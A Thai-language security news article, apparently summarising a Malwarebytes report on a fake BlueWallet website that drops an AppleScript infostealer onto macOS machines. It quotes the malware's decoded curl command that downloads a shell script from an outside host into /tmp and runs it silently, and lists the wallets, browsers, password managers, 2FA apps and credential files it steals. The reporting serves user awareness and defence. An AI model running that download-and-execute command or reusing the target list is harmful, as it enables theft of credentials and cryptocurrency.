ชาวคริปโตระวัง BlueWallet ปลอม ขโมยเหรียญคริปโต, รหัสผ่าน และบัญชีบน macOS

ชาวคริปโตระวัง BlueWallet ปลอม ขโมยเหรียญคริปโต, รหัสผ่าน และบัญชีบน macOS

จากรายงานโดยเว็บไซต์อย่างเป็นทางการของผู้พัฒนาเครื่องมือต่อต้านมัลแวร์ยอดนิยม Malwarebytes ได้กล่าวถึงแคมเปญแพร่กระจายมัลแวร์ที่อ้างตัวเป็นกระเป๋าเงินคริปโตเคอร์เรนซีชื่อว่า BlueWallet ซึ่งเป็นกระเป๋าที่มีการพัฒนาอยู่จริง ๆ แต่ถูกแฮกเกอร์ที่อยู่เบื้องหลังมัลแวร์แอบอ้างชื่อมาใช้งานเป็นตัวกลางในการปล่อยมัลแวร์ลงสู่เครื่องของเหยื่อ เพื่อใช้ในการขโมยข้อมูลและเงินบนกระเป๋าคริปโตเคอร์เรนซีของเหยื่อ รวมไปถึงข้อมูลอื่น ๆ เช่น รหัสผ่านที่ถูกบันทึกไว้บนเครื่อง, ข้อมูลบนเว็บเบราว์เซอร์, ไฟล์เอกสารต่าง ๆ บนเครื่องของเหยื่อ, และข้อมูลอ่อนไหวอื่น ๆ โดยคราวนี้จะเป็นการมุ่งเน้นเป้าหมายไปยังกลุ่มผู้ใช้งานระบบปฏิบัติการ macOS โดยเฉพาะ

สำหรับในส่วนของแคมเปญนั้น แฮกเกอร์จะใช้วิธีการหลอกลวงเหยื่อด้วยวิธีการทำวิศวกรรมทางสังคม (Social Engineering) หลอกให้เหยื่อเข้าเว็บไซต์ปลอมของ BlueWallet ที่มี URL คือ update-bluewallet[.]com (ขณะที่ของจริงคือ bluewallet[.]io) โดยภายในเว็บไซต์นั้นจะคล้ายกับเว็บไซต์ ของ BlueWallet จริง ๆ แทบทุกประการทำให้หลายคนไม่สังเกตว่าเป็นเว็บไซต์ปลอม ตัวเว็บไซต์นั้นจะไม่ถามความยินยอม (Consent) ก่อนดาวน์โหลดไฟล์ BlueWallet Installer.applescript ลงไปยังโฟล์เดอร์ Download บนเครื่องของเหยื่ออย่างไม่รู้ตัวภายใน 2 วินาทีหลังจากเหยื่อเข้าสู่เว็บไซต์ (ซึ่งจะมีการดาวน์โหลดอีกครั้งเช่นเดียวกัน ถ้าเหยื่อทำการคลิ๊กปุ่ม 1 ใน 2 ปุ่มที่ปรากฏอยู่บนเว็บไซต์) โดยสิ่งที่ร้ายกาจคือ ไฟล์ดังกล่าวไม่ใช่ไฟล์สำหรับการรัน (Binary) แบบทั่วไป แต่เป็นไฟล์ที่บรรจุสคริปท์แบบ Apple Script เอาไว้ ทำให้ไม่ถูกกัก (Quarantine) โดยระบบป้องกันของ macOS

ในขั้นตอนการติดตั้งมัลแวร์ตัวแรกในคราบกระเป๋าเงินปลอมนั้น จะเริ่มจากคำสั่งบนเว็บไซต์ที่หลอกลวงให้เหยื่อเปิด Script Editor ขึ้นมาเพื่อใช้รันสคริปท์มัลแวร์ ด้วยการบอกให้เหยื่อกดปุ่ม Play หรือ ปุ่ม ⌘R เพื่อเปิดแอปพลิเคชันดังกล่าวขึ้นมารันสคริปท์ในไฟล์ดังกล่าวอ้างว่าเป็นการติดตั้งกระเป๋า โดยสคริปท์ภายในนั้นเมื่อทางทีมวิจัยได้ทำการถอดรหัส (Decoded) ออกมาแล้วจะเป็นสคริปท์ในการดาวน์โหลดไฟล์มัลแวร์ (Payload) ตัวถัดไปลงมาโดยที่เหยื่อไม่รู้ตัว ซึ่งตัวคำสั่งนั้นจะมีลักษณะดังนี้

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

ซึ่งไฟล์ที่มีสกุล .sysupd.sh นั้นจะเป็นการปลอมไฟล์ให้เหมือนกับไฟล์สำหรับการอัปเดตทั่วไป ต่อไปเมื่อตัว Payload ได้ลงมาฝังบนเครื่อง ก็จะมีการใช้คำสั่ง umask 077 เพื่อกำหนดสิทธิ์ให้สิ่งที่ถูกมัลแวร์สร้างขึ้นนั้นจะมองเห็นเฉพาะผู้ใช้งานที่เป็นเหยื่อ (Compromised User) เท่านั้น ซึ่งจะเป็นการป้องกันการใช้งานชื่อผู้ใช้งานอื่น (User) เข้ามาวิเคราะห์การทำงานของมัลแวร์ โดยตัวมัลแวร์นั้นจะทำงานภายใต้โฟลเดอร์ชั่วคราวชื่อ /tmp ซึ่งถูกสร้างขึ้นมาจาก /dev/urandom ในส่วนของการตั้งค่า (Configuration) ก็เป็นไปในรูปแบบเพื่อการตีรวนระบบป้องกัน (Obfuscation) ทว่าก็ไม่ได้แนบเนียนมากเหมือนกับมัลแวร์ตัวอื่น โดยฟังก์ชัน _xd จะทำการวนอ่านค่าสตริง (String) แบบเลขฐานสิบหก (Hex) ทีละ 2 ตัว และทำการถอดรหัสที่ถูกเข้ารหัสแบบ XOR ที่ละไบต์ (Byte) ด้วยการใช้กุญแจ (Key) ที่ถูกตั้งค่าคงที่ (Hardcoded) ว่า swckR9JCD2Uu 

การถอดรหัสดังกล่าวนั้นจะเป็นการถอดรหัส Token ของ Telegram Bot ที่ทำหน้าที่เป็นเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control), รหัสระบุแชท (Chat Identifier), Token สำหรับการควบคุมตัวที่ 2, และ URL สำหรับการใช้งานในช่วง Runtime นอกจากนั้นระบบถอดรหัสดังกล่าวยังใช้ในการถอดรหัสคำสั่ง (Command) ที่ได้รับจากบอทบน Telegram อีกด้วย

สำหรับข้อมูลที่มัลแวร์ตัวนี้สามารถขโมยได้ก็มีมากมายหลายหมวด เช่น

ข้อมูลบนเว็บเบราว์เซอร์ โดยสนับสนุนการขโมยข้อมูลจากเว็บเบราว์เซอร์หลายตระกูล เช่น

ตระกูล Chromium ซึ่งจะครอบคลุม Google Chrome, Brave, Microsoft Edge, Vivaldi, Opera, Opera GX, Arc, Chromium, Coccoc, และ Yandex

ตระกูล Firefox เช่น Firefox, Waterfox, Pale Moon, Zen, และ LibreWolf

และ เว็บเบราว์เซอร์ของ macOS เองอย่าง Safari โดยสามารถขโมยข้อมูล เช่น ไฟล์ Cookies, ข้อมูลบนแบบฟอร์ม, และประวัติการท่องเว็บไซต์ (History) ได้

กระเป๋าคริปโตเคอร์เรนซี (Crypto Wallet) โดยจะครอบคลุมกระเป๋าหลายประเภท อย่าง

แอปพลิเคชันกระเป๋าบนเดสก์ท็อป (Desktop) เช่น Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, และ Tonkeeper

กระเป๋าแบบส่วนเสริมเว็บเบราว์เซอร์ (Extension) เช่น Xverse, Leather, UniSat, Alby, Wizz, Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, Slope, MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, XDEFI, Keplr, Station, Cosmostation, Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, และ Temple

ข้อมูลบนเครื่องมือจัดการรหัสผ่าน (Password Manager) เช่น

1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, และ Buttercup

ข้อมูลของเครื่องมือยืนยันตัวตนแบบ 2 ชั้น (2FA หรือ 2 Factors Authentication) เช่น

Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, และ FreeOTP

แอปพลิเคชันสำหรับการแชท ต่าง ๆ เช่น

Telegram Desktop และ Discord (ครอบคลุม Discord Canary และ Discord PTB)

แอปพลิเคชันทั่วไปในรูปแบบส่วนเสริมของเว็บเบราว์เซอร์ เช่น

Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, และ Google Keep

ระบบสำหรับการพัฒนาซอฟต์แวร์ และ ระบบคลาวด์ เช่น

ไฟล์ตั้งค่าของระบบคลาวด์ AWS ในรูปแบบไฟล์ .aws

ไฟล์กุญแจ SSH สกุล .ssh

ไฟล์กุญแจ GnuPG สกุล .gnupg

ไฟล์ตั้งค่า Kubernetes สกุล .kube

ไฟล์ Shell และ Git สกุล .zshrc, .zsh_history, .bash_history, และ .gitconfig

และไฟล์ข้อมูลทั่วไปบนเครื่องของเหยื่อ โดยครอบคลุมสกุลต่าง ๆ ดังนี้

.txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, และ .env,